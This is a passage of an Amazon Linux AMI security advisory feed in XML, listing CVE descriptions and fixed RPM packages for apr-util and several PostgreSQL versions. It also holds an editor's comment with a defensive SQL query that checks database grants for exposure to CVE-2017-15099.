</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12613" title="" id="CVE-2017-12613" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apr-devel" version="1.5.2" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-devel-1.5.2-5.13.amzn1.x86_64.rpm</filename></package><package name="apr-debuginfo" version="1.5.2" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-debuginfo-1.5.2-5.13.amzn1.x86_64.rpm</filename></package><package name="apr" version="1.5.2" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-1.5.2-5.13.amzn1.x86_64.rpm</filename></package><package name="apr-devel" version="1.5.2" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/apr-devel-1.5.2-5.13.amzn1.i686.rpm</filename></package><package name="apr" version="1.5.2" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/apr-1.5.2-5.13.amzn1.i686.rpm</filename></package><package name="apr-debuginfo" version="1.5.2" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/apr-debuginfo-1.5.2-5.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-929</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-929: medium priority package update for apr-util</title><issued date="2017-12-05 21:59:00" /><updated date="2017-12-06 21:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12618:
Apache Portable Runtime Utility (APR-util) 1.6.0 and prior fail to validate the integrity of SDBM database files used by the apr_sdbm*() functions, resulting in a possible out-of-bounds read. A local user with write access to the database can make a program or process using these functions crash, causing a denial of service.
1506532:
CVE-2017-12618 apr-util: Out-of-bounds access in corrupted SDBM database
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12618" title="" id="CVE-2017-12618" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apr-util-sqlite" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-sqlite-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-mysql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-mysql-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-odbc-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-openssl-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-ldap-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-devel-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-pgsql-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-nss-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-debuginfo-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package 
name="apr-util-freetds" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-freetds-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-openssl-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-ldap-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-sqlite" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-sqlite-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-pgsql-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-odbc-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-debuginfo-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-devel-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-freetds-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-nss-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-mysql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-mysql-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/apr-util-1.5.4-6.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-930</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-930: medium priority package update for postgresql95 postgresql96</title><issued date="2017-12-05 22:18:00" /><updated date="2017-12-06 21:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15099:
INSERT ... ON CONFLICT DO UPDATE commands in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, and 9.5.x before 9.5.10 disclose table contents that the invoker lacks privilege to read. These exploits affect only tables where the attacker lacks full read access but has both INSERT and UPDATE privileges. Exploits bypass row level security policies and lack of SELECT privilege.
1508823:
CVE-2017-15099 postgresql: INSERT ... ON CONFLICT DO UPDATE fails to enforce SELECT privileges
CVE-2017-15098:
Invalid json_populate_recordset or jsonb_populate_recordset function calls in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, 9.5.x before 9.5.10, 9.4.x before 9.4.15, and 9.3.x before 9.3.20 can crash the server or disclose a few bytes of server memory.
1508820:
CVE-2017-15098 postgresql: Memory disclosure in JSON functions
CVE-2017-12172:
Privilege escalation flaws were found in the initialization scripts of PostgreSQL. An attacker who has obtained access to the postgres user account, whether locally or remotely, could use these flaws to obtain root access on the server machine.
1498394:
CVE-2017-12172 postgresql: Start scripts permit database administrator to modify root-owned files
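<!--
Added check (editor's addition, not part of the advisory or of PostgreSQL): the CVE-2017-15099 entry above only bites where a role holds INSERT and UPDATE on a table but not SELECT. The query lists exactly those direct grants so the exposure can be reviewed while the postgresql95/postgresql96 update is rolled out; the second statement reports the server version to compare with the fixed releases the advisory names (9.5.10 and 9.6.6). It assumes you connect as a superuser so every relacl is visible; column-level grants, privileges inherited through role membership and row-level-security policies are outside what it inspects.

```sql
/* Direct table grants matching the CVE-2017-15099 precondition:
   grantee can INSERT and UPDATE the table but cannot SELECT from it.
   aclexplode() expands pg_class.relacl into one row per privilege;
   grantee 0 is PUBLIC. Tables with a NULL relacl (owner only) produce
   no rows, which is correct because the owner already has SELECT. */
SELECT n.nspname AS schema_name,
       c.relname  AS table_name,
       CASE a.grantee WHEN 0 THEN 'PUBLIC'
                      ELSE pg_get_userbyid(a.grantee) END AS grantee
FROM   pg_catalog.pg_class c
JOIN   pg_catalog.pg_namespace n ON n.oid = c.relnamespace
CROSS JOIN LATERAL pg_catalog.aclexplode(c.relacl) AS a
WHERE  c.relkind = 'r'
AND    n.nspname NOT IN ('pg_catalog', 'information_schema')
GROUP  BY n.nspname, c.relname, a.grantee
HAVING bool_or(a.privilege_type = 'INSERT')
   AND bool_or(a.privilege_type = 'UPDATE')
   AND NOT bool_or(a.privilege_type = 'SELECT');

/* Compare with the fixed releases in the advisory: 9.5.10 and 9.6.6. */
SELECT current_setting('server_version') AS server_version;
```

An empty first result set does not mean the server is safe, only that no direct grant matches; the package update is still the fix.
-->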
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12172" title="" id="CVE-2017-12172" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15098" title="" id="CVE-2017-15098" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15099" title="" id="CVE-2017-15099" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-server" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" 
version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.10-1.77.amzn1.i686.rpm</filename></package><package 
name="postgresql95" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.6" release="1.79.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.6" 
release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.6-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-931</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-931: medium priority package update for postgresql92 postgresql93 postgresql94</title><issued date="2017-12-05 22:19:00" /><updated date="2017-12-06 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15098:
Invalid json_populate_recordset or jsonb_populate_recordset function calls in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, 9.5.x before 9.5.10, 9.4.x before 9.4.15, and 9.3.x before 9.3.20 can crash the server or disclose a few bytes of server memory.
1508820:
CVE-2017-15098 postgresql: Memory disclosure in JSON functions
CVE-2017-12172:
Privilege escalation flaws were found in the initialization scripts of PostgreSQL. An attacker who has obtained access to the postgres user account, whether locally or remotely, could use these flaws to obtain root access on the server machine.
1498394:
CVE-2017-12172 postgresql: Start scripts permit database administrator to modify root-owned files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12172" title="" id="CVE-2017-12172" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15098" title="" id="CVE-2017-15098" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-docs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="1.65.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-1.65.amzn1.i686.rpm</filename></package><package 
name="postgresql92-libs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package 
name="postgresql94-libs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.15" release="1.73.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql94-libs-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.20" release="1.69.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.20" release="1.69.amzn1" epoch="0" 